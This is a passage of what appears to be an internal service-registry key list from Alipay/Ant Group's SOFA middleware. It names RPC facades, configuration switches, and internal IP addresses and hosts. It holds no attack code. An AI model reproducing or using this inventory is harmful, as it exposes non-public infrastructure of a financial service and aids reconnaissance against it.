GROUP","Alipay.zcache:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.AssetSKUQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.142.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.pdcore.common.service.facade.zcb.ZcbProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.core.AutoCoreTradeFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.requirement.service.facade.RequirementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.FinacSimulationCollectDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finresprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.service.facade.DataRecoverService:1.0:busMerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.142.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mobilechat:name=com.alipay.mobilechat.common.gray.client.drm.MobilechatGrayClientDrmSwitch.mwalletmng.invokeSyncSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchorder.ordercenter.facade.service.HuanxuUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.cptor.facade.search.CptorGroupRoleSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mctlib.common.facade.intf.RegularViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:Asop_RecordMng_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antaid.common.service.facade.api.ChangeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antmobilecloudtest@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quickrun.common.service.api.TaskRunningFacade:1.0:exriskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightCommonRpcSpi:1.0:merchantRiskProfileService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.metadata.api.BizAppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apires@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.integration.biscenter.OperatorShopPermissionClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.autoaccess.EbppLeadsExpandInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbprizeprod.common.service.facade.rpc.CampTriggerRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.bizindicator.BizKeyIndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.archspec.GlobalSiteSpecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.largeStockFileWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergwd4541.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.167.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.arcore.common.service.facade.ArLinkedOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_DBACKAPPLY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:finslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.test2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.trigger.TriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.intel.service.api.pacioli.BankCardGetFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdabombardier.common.service.facade.device.IotDeviceApplyTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.common.service.facade.merchant.MerchantQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.ProductListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.attribute.facade.AttributeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.message.service.EventMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:minicreateweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.common.service.facade.api.BizAttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.applet.sign.MerchantFastWithholdSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.192.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dayutrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zmhatcher@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.asset.AssetDeviceBizTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.user.LoanServiceFuncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.CountConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.keeper.TrCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.biz.dst.DstDataService:1.0:knowlegeGraphService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.common.service.facade.ppoint.service.PaymentRefundPointRecycleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.oneservice.sdk.api.SqlExecutorApi:1.0:dponeservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.coopr.common.service.facade.pkg.PackageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:instinfo.instal.apply.product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobileacauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.codec.repository.cache.EmvCoGuidPriorityConfigCache:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.GateWayFacade:1.0:metaDataFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.SnsCampManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:test_service0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.TransferFeeConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.jobbulid.KnowledgeImportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.al.studio.service.facade.ray.RayMng:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.biz.service.review.ReviewLabelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartscene.common.facade.ScardRecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.FundQuotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:searchLabel_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileufs.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitydata.common.service.facade.network.NetworkGroupQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpchangeguardian.common.facade.bu.BuApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.CreditedService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zarcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontentrp.common.service.facade.KbContentRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmcpcsprod.common.service.facade.PaybackBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:alphasecmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.decision.DecisionServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.opevent.mng.OpEventMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-mobilecodec-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.0.140.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.infrastructure.facade.config.system.TwoStepSecurityRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.IndirectMerchantDRM.ctuCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antscan86842598-80102053-uniqueId-104003038antend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.product.spi.SecurityProductChecker:1.0:ctu@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.openid.OpenIdGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanapply.facade.apply.service.LoanApplyContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopcenter.common.service.facade.external.api.ShopExternalDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:materialcenterAuditNodeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.inner.facade.api.FatigueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.processmngTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.service.facade.OracleRefundInstructionQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.island.IslandSignal.useIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecquery.common.service.drawndn.ExemptInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mordercenter.common.service.facade.api.query.KbOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-dqtranscore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cscheck.service.facade.api.GqcOperateLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.reload,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.core.service.emulator.common.logsim.genericsofacall.OeEmulatorGenericSofaCallService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.79.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.openCampCertificationPidsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.selectcore.common.service.facade.api.ControlListManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.verify.rpc.facade.TrainingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.PartnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.activity.ActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.money.core.StdTrusteeOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceLibrarySynQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.channel.PublicFollowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.recon.common.service.facade.api.AccItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.testRunJdbcUrlForbidWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:lifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finlsmicrogw.common.service.facade.gateway.api.DataFetchPlanConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.ProductCategoriesFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.55.211.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdataprod.common.service.facade.interfaces.CrowdGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.play.jbdouble11.Jb2020Double11Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.7.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inslifeprod.common.facade.continuous.InsLifeContinuousFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.nuccExchangeCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_PRESUBMIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.holoxmng.content.service.facade.HoloxLabelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeSubjoinManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ArLinkedOperateFacade:1.0:zhiMaArLinkedOperateFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.bpservice.facade.customer.CustomerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.logLevelView,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.244.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_OWEN_DEBUG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openmonitor.devicmtn.service.facade.DevicemtnTaskProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.crowd.CrowdQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.AbnormalSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_instSignConfirmCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.submit.SubmitRecordApi:1.0:dataphin-publishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.product.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:zimtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@cswork#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finfundtrade.common.service.facade.api.FundTradeRefundQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mfinpromo.MfinpromoEquityYebPlusService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_AIX#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvCampTemplateManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_OPEN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.biz.service.inspect.rpc.gw.InspectFailureGWFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.investtrade.facade.api.security.SecurityDealStockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.asttshipcore.service.facade.api.trans.AstTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundselling.common.service.matchtrade.MatchProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.IndustryUserTagServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue26#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zmp.facade.PanamaMessengerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyRelativeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.markresult.api.IMarkSampleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.service.analyze.facade.SecurityPolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainmessage.impl.FraudFeedBackWordingSwitchImpl.ignoreTaskEndMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininfo.common.service.facade.info.InfoCallService:1.0:instinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.v2.ShopManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditchannelsff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:exriskcenterCommonCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.134.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamcore.common.service.facade.identity.StsActorServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.deploy.MiscFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:abnclprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.material.MaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.order.IotOrderManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.diagnosis.service.spi.DiagnosisAuthenticationService:1.0:bkcloudfunds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.autoaccess.EbppChargeInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.acauditcenter.facade.OperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.antgroup.zmxy.zmopenapi.service.facade.MaYiInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.checkroute.common.service.trigger.CheckRouteDataCollectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.mif.common.service.facade.MerchantSiteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_INST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.imatchfacade.cdp.DeliveryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.cp.api.CpAccompanyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.57.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:fincontentmngweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdEmployeeOrganizationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.rate.BlockChainRateOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINFUNDTASKCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.activity.service.XqlcAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assetfluxdecision.biz.service.spi.AssetInfoConsultService:1.0:financingcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.StandardVoucherUploadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KWLIB#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundselling.share.bankcard.BankCardValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.api.query.LabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexratecenter.service.facade.api.ExSourceRateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.16.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.ebpp.InstGeographyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgengine.core.service.dispatch.singleTask.KgSingleTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.ctid.spi.CtidOpenApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.98.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dt.oneservice.meta.MetaDataService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.apppackage.PackageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatacenter.common.service.facade.myreports.MetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.repo.rpc.RevolModelQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ioteds.bizunit.api.EdsBizUnitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.element.EmtPackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_I